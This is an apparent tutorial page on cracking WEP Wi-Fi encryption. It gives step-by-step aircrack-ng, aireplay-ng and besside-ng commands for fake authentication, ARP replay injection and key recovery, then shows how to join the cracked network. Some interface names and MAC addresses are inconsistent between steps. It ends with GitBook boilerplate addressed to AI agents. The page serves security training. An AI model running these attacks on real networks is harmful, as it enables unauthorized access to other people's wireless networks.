> For the complete documentation index, see [llms.txt](https://wifi-hacking.cavementech.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://wifi-hacking.cavementech.com/wep.md).

# WEP

### Manual Cracking WEP

You need to understand the goal: we are exploiting the mathematical weakness of WEP by capturing and re-injecting packets to force the Access Point (AP) to generate a high volume of Initialization Vectors (IVs). Once we have enough IVs, we can solve for the key.

#### Phase 1: Environment Setup

1. Put wlan2 into Monitor Mode:

```
airmon-ng start wlan6 
```

*Note: This usually creates an interface named wlan6mon.*

<figure><img src="/files/sQCMJnlcnvXRO19jIpgw" alt=""><figcaption></figcaption></figure>

***

#### Phase 2: The Attack Walkthrough (Multi-Tab)

**Tab A: Targeted Capture**

First, see the running networks

```
airodump-ng --band abg wlan6mon
```

<figure><img src="/files/D7tZOvtgxydgO4KoYBI5" alt=""><figcaption></figcaption></figure>

This tab stays open to collect the "votes" (IVs) needed to crack the key.

```
airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w WEP_Capture --output-format pcap wlan6mon
```

* Monitor: Watch the `#Data` column. You need this number to start climbing fast.

<figure><img src="/files/1t6HlIcx9UoHDDerN9As" alt=""><figcaption></figcaption></figure>

**Tab B: Fake Authentication (If no active clients connected to the AP, essential then)**

We use wlan6mon to "introduce" ourselves to the AP. Without this, the AP will ignore our injected traffic.

```
aireplay-ng -1 6000 -o 1 -q 10 -e SweetB-WEP -a 02:00:00:00:00:00 -h 02:00:00:00:01:00 wlan6mon
```

#### Command Breakdown

* `aireplay-ng`: The core tool used for 802.11 packet injection and generation.
* `-1 6000`: Specifies Fake Authentication mode. The `6000` tells the tool to re-authenticate every 6,000 seconds to keep the connection alive.
* `-o 1`: Sends only one set of authentication/association packets at a time (standard for most APs).
* `-q 10`: Sends "keep-alive" packets every 10 seconds to ensure the AP doesn't drop your connection due to inactivity.
* `-e SweetB-WEP`: The ESSID (name) of the target network.
* `-a 02:00:00:00:00:00`: The BSSID (MAC address) of the target Access Point.
* `-h 02:00:00:00:06:00`: Your Source MAC address. This is the MAC of the interface you are using to attack (e.g., `wlan2mon`).
* `wlan2mon`: The specific wireless interface you are using in monitor mode
* **Success: Look for `Association successful :-) (AID: 1)`.**

<figure><img src="/files/CRcwCFWPVZRjxWuSZT4B" alt=""><figcaption></figcaption></figure>

Same command with limited parameters

```
sudo aireplay-ng -1 3600 -q 10 -a F0:9F:C2:71:22:11 wlan0mon
```

<figure><img src="/files/Ajdc1792JUZ3HYLcLOJC" alt=""><figcaption></figcaption></figure>

**Tab C: ARP Replay Attack**

This is the engine. It listens for a network packet and re-broadcasts it 500 times per second.

```
aireplay-ng -3 -b 02:00:00:00:00:00 -h 02:00:00:00:01:00 wlan6mon
```

#### Command Breakdown

* `aireplay-ng`: The tool used for 802.11 packet injection.
* `-3`: Specifies the ARP Request Replay attack mode.
* `-b 02:00:00:00:00:00`: Sets the BSSID (MAC address) of the target Access Point.
* `-h 02:00:00:00:01:00`: Sets the Source MAC address (usually your own interface's MAC or a successfully associated client).
* `wlan6mon`: The specific wireless interface you are using in monitor mode
* <mark style="color:$warning;">Troubleshooting: If data isn't rising, go to another tab and run</mark> <mark style="color:$warning;"></mark><mark style="color:$warning;">**`ping 192.168.8.5`**</mark> <mark style="color:$warning;"></mark><mark style="color:$warning;">to generate the initial ARP packets the attack needs.</mark>

<figure><img src="/files/jqGfbZqIR9DylzApkYid" alt=""><figcaption></figcaption></figure>

or use the following

```
sudo aireplay-ng --arpreplay -b F0:9F:C2:71:22:11 -h 02:00:00:00:00:00 wlan0mon
```

**Tab D: Cracking the Key**

You can run this while the other tabs are still working. It will update as more IVs are captured.

```
aircrack-ng -b 02:00:00:00:00:00 WEP_Capture-01.cap
```

<figure><img src="/files/GkaRWeSrmUQP6IyqMpVH" alt=""><figcaption></figcaption></figure>

***

#### Expected Results

* IV Count: The attack will restart every 5,000 captured IVs until it finds the key.
* Key Found: When successful, you will see `KEY FOUND! [ EA:BC:DE:F1:23 ]` (example key).
* Decryption: It should report `Decrypted correctly: 100%`.

### Automated WEP cracking with **besside-ng**

```
airmon-ng check kill
sudo besside-ng -c 3 -b F0:9F:C2:71:22:11 wlan2 -v
```

**1. `besside-ng` (Automated WEP/WPA Attack Tool)**

* A tool that **automatically** captures handshakes for WPA/WPA2 networks and **cracks WEP encryption**.

**2. `-c 3` (Target Channel 3)**

* This forces `besside-ng` to **only scan and attack Wi-Fi networks on channel 3**.
* Useful for **faster attack execution** instead of scanning all channels.

**3. `-b F0:9F:C2:71:22:11` (Target Specific BSSID)**

* **F0:9F:C2:71:22:11** is the **BSSID** (MAC address of the target router/AP).
* Ensures `besside-ng` attacks **only this specific access point** rather than scanning for all available networks.

**4. `wlan2` (Wireless Interface)**

* Specifies that `wlan2` is the **wireless adapter** being used.

**5. `-v` (Verbose Mode)**

* Enables **detailed output** for better tracking of the attack progress.

<figure><img src="https://wifi-hacking.cavementech.com/~gitbook/image?url=https%3A%2F%2F566300827-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FpRJWncf6N0vRLq29OrFf%252Fuploads%252FNXxik7hddQoTWS3T8ySx%252Fimage.png%3Falt%3Dmedia%26token%3Dd296c867-2f5b-4e24-be1b-07bf944bdee6&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=28650978&#x26;sv=2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://wifi-hacking.cavementech.com/~gitbook/image?url=https%3A%2F%2F566300827-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FpRJWncf6N0vRLq29OrFf%252Fuploads%252Fj8oTOLRAqA52m1roCcgy%252Fimage.png%3Falt%3Dmedia%26token%3D3648b4b8-a794-418d-9c08-78c91cc35ab3&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=d231bc6d&#x26;sv=2" alt=""><figcaption></figcaption></figure>

### Connecting to the cracked WEP Wifi Network

Once we have the password we can connect to the WEP network:

Create a configuration file to connect to the WEP network.

```
nano wep.conf
```

The content should look like this.

```
network={
  ssid="wifi-old"
  key_mgmt=NONE
  wep_key0=11BB33CD55
  wep_tx_keyidx=0
}
```

Now we can connect to the WEP network with our configuration file.

```
sudo wpa_supplicant -D nl80211 -i wlan2 -c wep.conf
```

We should try to retrieve an IP address from the DHCP server.

```
sudo dhclient wlan2 -v
```

<figure><img src="https://wifi-hacking.cavementech.com/~gitbook/image?url=https%3A%2F%2F566300827-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FpRJWncf6N0vRLq29OrFf%252Fuploads%252FNOn4OG7A6YYdFt3FtfsC%252Fimage.png%3Falt%3Dmedia%26token%3Dabd789d1-d665-401f-949f-fcbdc3846c00&#x26;width=768&#x26;dpr=3&#x26;quality=100&#x26;sign=560d4515&#x26;sv=2" alt=""><figcaption></figcaption></figure>

{% embed url="<https://youtu.be/vcYTgJ6_mXE>" %}

{% embed url="<https://www.udemy.com/course/wifi-hacking-wireless-penetration-testing/?referralCode=D8572F8D3CF528F93BEB>" %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wifi-hacking.cavementech.com/wep.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.